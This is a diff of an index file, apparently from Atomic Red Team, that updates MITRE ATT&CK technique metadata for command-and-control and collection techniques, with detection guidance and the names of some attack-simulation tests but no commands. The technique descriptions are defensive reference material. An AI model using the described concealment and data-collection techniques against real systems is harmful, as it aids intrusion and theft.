       name: Data Obfuscation
       description: 'Adversaries may obfuscate command and control traffic to make
         it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -45199,11 +45680,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1571:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:37:57.868Z'
       name: Non-Standard Port
       description: |-
         Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -45212,20 +45692,20 @@ command-and-control:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze packet contents to detect communications that do
         not follow the expected protocol behavior for the port that is being used.
         Analyze network data for uncommon data flows (e.g., a client sending significantly
         more data than it receives from a server). Processes utilizing the network
         that do not normally have network communication or have never been seen before
         are suspicious.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
@@ -45250,17 +45730,16 @@ command-and-control:
         url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       - source_name: Fortinet Agent Tesla April 2018
         description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
           Variant. Retrieved November 5, 2018.
         url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1571
     atomic_tests:
     - name: Testing usage of uncommonly used port
@@ -45349,7 +45828,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1573
     atomic_tests: []
   T1102.002:
@@ -45374,7 +45852,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:15:47.861Z'
       name: Bidirectional Communication
       description: "Adversaries may use an existing, legitimate external Web service
         as a means for sending commands to and receiving output from a compromised
@@ -45411,8 +45889,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1573.002:
     technique:
@@ -45466,7 +45942,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1095:
     technique:
@@ -45538,33 +46013,12 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1095
     atomic_tests: []
   T1001.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
-      type: attack-pattern
-      created: '2020-03-15T00:40:27.503Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1001.003
-        url: https://attack.mitre.org/techniques/T1001/003
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
-      name: Protocol Impersonation
+      modified: '2024-10-09T15:40:19.436Z'
+      name: Protocol or Service Impersonation
       description: "Adversaries may impersonate legitimate protocols or web service
         traffic to disguise command and control activity and thwart analysis efforts.
         By impersonating legitimate protocols or web services, adversaries can make
@@ -45572,23 +46026,61 @@ command-and-control:
         \ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
         like subsequent traffic is SSL/TLS encrypted, potentially interfering with
         some security tooling, or to make the traffic look like it is related with
-        a trusted entity. "
+        a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+        impersonate expected web traffic or trusted services. For example, adversaries
+        may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+        data to disguise C2 communications or mimic legitimate services such as Gmail,
+        Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+        Malleable-C2-U42)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - James Emery-Callcott, Emerging Threats Team, Proofpoint
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
         sending significantly more data than it receives from a server). Processes
         utilizing the network that do not normally have network communication or have
         never been seen before are suspicious. Analyze packet contents to detect communications
         that do not follow the expected protocol behavior for the port that is being
         used.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+      created: '2020-03-15T00:40:27.503Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1001/003
+        external_id: T1001.003
+      - source_name: Malleable-C2-U42
+        description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+          Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+          How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+          September 24, 2024.'
+        url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      - source_name: ESET Okrum July 2019
+        description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+          RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1090.004:
     technique:
@@ -45635,7 +46127,6 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1132:
     technique:
@@ -45695,7 +46186,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.002:
     technique:
@@ -45727,7 +46217,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-14T23:39:50.117Z'
       name: Non-Standard Encoding
       description: 'Adversaries may encode data with a non-standard data encoding
         system to make the content of command and control traffic more difficult to
@@ -45753,8 +46243,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.001:
     technique:
@@ -45821,7 +46309,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.001
     atomic_tests:
     - name: Malicious User Agents - Nix
@@ -45939,7 +46426,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1105
     atomic_tests:
     - name: rsync remote file copy (push)
@@ -46303,7 +46789,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1001.002:
     technique:
@@ -46327,7 +46812,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-15T00:37:58.963Z'
       name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
@@ -46350,8 +46835,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1001.002
     atomic_tests:
     - name: Execute Embedded Script in Image via Steganography
@@ -46404,7 +46887,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:49:47.340Z'
       name: Fallback Channels
       description: Adversaries may use fallback or alternate communication channels
         if the primary channel is compromised or inaccessible in order to maintain
@@ -46424,8 +46907,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.001:
     technique:
@@ -46479,7 +46960,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.001
     atomic_tests:
     - name: Connection Proxy
@@ -46552,7 +47032,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:12:30.499Z'
       name: Dead Drop Resolver
       description: |-
         Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -46578,8 +47058,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1001.001:
     technique:
@@ -46633,7 +47111,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 collection:
   T1560.001:
@@ -46709,7 +47186,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560.001
     atomic_tests:
     - name: Data Compressed - nix - zip
@@ -46952,7 +47428,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1113
     atomic_tests:
     - name: X Windows Capture
@@ -47181,7 +47656,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.001:
     technique:
@@ -47260,7 +47734,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests:
     - name: Living off the land Terminal Input Capture on Linux with pam.d
@@ -47508,7 +47981,7 @@ collection:
         Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
 
         Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:32:58.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data from Configuration Repository
       x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -47523,30 +47996,10 @@ collection:
       - 'Network Traffic: Network Connection Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
-      type: attack-pattern
-      created: '2020-02-14T13:35:32.938Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.002
-        url: https://attack.mitre.org/techniques/T1213/002
-      - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
-        description: Microsoft. (2017, July 19). Configure audit settings for a site
-          collection. Retrieved April 4, 2018.
-        source_name: Microsoft SharePoint Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Sharepoint
       description: |
         Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -47555,13 +48008,17 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: "The user access logging within Microsoft's SharePoint can
         be configured to report access to certain pages and documents. (Citation:
         Microsoft SharePoint Logging). As information repositories generally have
@@ -47575,20 +48032,37 @@ collection:
         of programmatic means being used to retrieve all data within the repository.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'Cloud Service: Cloud Service Metadata'
+      type: attack-pattern
+      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+      created: '2020-02-14T13:35:32.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/002
+        external_id: T1213.002
+      - source_name: Microsoft SharePoint Logging
+        description: Microsoft. (2017, July 19). Configure audit settings for a site
+          collection. Retrieved April 4, 2018.
+        url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
     atomic_tests: []
   T1123:
     technique:
-      modified: '2024-01-23T22:53:18.389Z'
+      modified: '2024-10-15T13:39:22.774Z'
       name: Audio Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -47631,7 +48105,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1123
     atomic_tests: []
   T1560.003:
@@ -47656,7 +48129,7 @@ collection:
         description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
           the Comings and Goings. Retrieved November 21, 2016.'
         source_name: ESET Sednit Part 2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T22:48:14.605Z'
       name: Archive via Custom Method
       description: 'An adversary may compress or encrypt data that is collected prior
         to exfiltration using a custom method. Adversaries may choose to use custom
@@ -47676,22 +48149,24 @@ collection:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Script: Script Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1114:
     technique:
-      modified: '2023-09-29T21:06:03.098Z'
+      modified: '2024-10-15T12:24:27.627Z'
       name: Email Collection
       description: 'Adversaries may target user email to collect sensitive information.
         Emails may contain sensitive data, including trade secrets or personal information,
-        that can prove valuable to adversaries. Adversaries can collect or forward
-        email from mail servers or clients. '
+        that can prove valuable to adversaries. Emails may also contain details of
+        ongoing incident response operations, which may allow adversaries to adjust
+        their techniques in order to maintain persistence or evade defenses.(Citation:
+        TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+        can collect or forward email from mail servers or clients. '
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -47708,11 +48183,10 @@ collection:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '2.5'
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -47728,37 +48202,28 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1114
         external_id: T1114
+      - source_name: CISA AA20-352A 2021
+        description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+          of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+          Retrieved August 30, 2024.
+        url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
       - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
         description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
           Retrieved October 8, 2019.
         url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+      - source_name: TrustedSec OOB Communications
+        description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+          Out-of-Band Communications are Essential for Incident Response. Retrieved
+          August 30, 2024.'
+        url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1025:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - William Cain
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
-      type: attack-pattern
-      created: '2017-05-31T21:30:31.584Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        url: https://attack.mitre.org/techniques/T1025
-        external_id: T1025
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:30:50.936Z'
       name: Data from Removable Media
       description: "Adversaries may search connected removable media on computers
         they have compromised to find files of interest. Sensitive data can be collected
@@ -47770,75 +48235,93 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - William Cain
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor processes and command-line arguments for actions
         that could be taken to collect files from a system's connected removable media.
         Remote access tools with built-in features may interact directly with the
         Windows API to gather data. Data may also be acquired through Windows system
         management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
         and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
       x_mitre_system_requirements:
       - Privileges to access removable media drive and files
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+      created: '2017-05-31T21:30:31.584Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1025
+        external_id: T1025
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1025
     atomic_tests: []
   T1074.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Massimiliano Romano, BT Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
-      created: '2020-03-13T21:13:10.467Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.001
-        url: https://attack.mitre.org/techniques/T1074/001
-      - source_name: Prevailion DarkWatchman 2021
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
-        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
-          new evolution in fileless techniques. Retrieved January 10, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:28:39.920Z'
+      name: 'Data Staged: Local Data Staging'
       description: |-
         Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
 
         Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Data Staged: Local Data Staging'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Massimiliano Romano, BT Security
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+      created: '2020-03-13T21:13:10.467Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/001
+        external_id: T1074.001
+      - source_name: Prevailion DarkWatchman 2021
+        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+          new evolution in fileless techniques. Retrieved January 10, 2022.'
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1074.001
     atomic_tests:
     - name: Stage data from Discovery.sh
@@ -47901,7 +48384,7 @@ collection:
